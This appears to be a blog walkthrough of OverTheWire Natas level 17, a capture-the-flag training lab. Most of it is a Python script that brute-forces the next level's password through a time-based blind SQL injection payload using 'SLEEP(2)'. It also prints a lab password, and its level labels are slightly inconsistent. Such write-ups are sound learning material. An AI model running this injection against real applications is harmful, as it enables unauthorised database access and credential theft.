OverTheWire:- Updated Natas Walkthrough — Level 17

3 min readApr 6, 2024

Hello everyone, I would like to share how I solved Nastas CTF also Here is the updated password, I hope this write-up will be helpful.

hello Folks!!! it’s a samxia99
My Bio link:-https://beacons.ai/samxia99
Greetings everyone! I’m excited to share with you how I was able to successfully conquer a CTF challenge. Through this write-up, I’ll provide a clear explanation of my techniques and strategies, and I’m confident that it will greatly benefit those who are interested in CTF challenges. So, sit back, relax, and let me take you on an informative journey.

Just a quick reminder that the game has been updated, so the password has also been changed. I hope this password is helpful!

Natas Level 16 → Level 17

Here are the login details.

Username: natas16
URL:      http://natas16.natas.labs.overthewire.org

After logging in we can see this page.

let’s view the source code.

This level is Time Based Blind SQL Injection type we can guess from the source code. so let’s try to brute force this level to be like other SQL levels. Here is the script saved as .py and brute force in the terminal using Python.

import requests
import re
from time import *

characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

username = "natas17"
password = "XkEuChE0SbnKBvH1RU7ksIb9uuLmI7sd"

Url = "http://natas17.natas.labs.overthewire.org"

session = requests.session()

current_password = list()

while(True):
    for character in characters:
        print("Trying with: " + "".join(current_password) + character)
        startTime = time()
        response = session.post(Url, data={"username": 'natas18" AND password LIKE BINARY "' + "".join(current_password) + character + '%" AND SLEEP(2) #'},auth=(username, password))
        endTime = time()
        if endTime - startTime > 2:
            current_password.append(character)
            break
    if len(current_password) == 32:
            break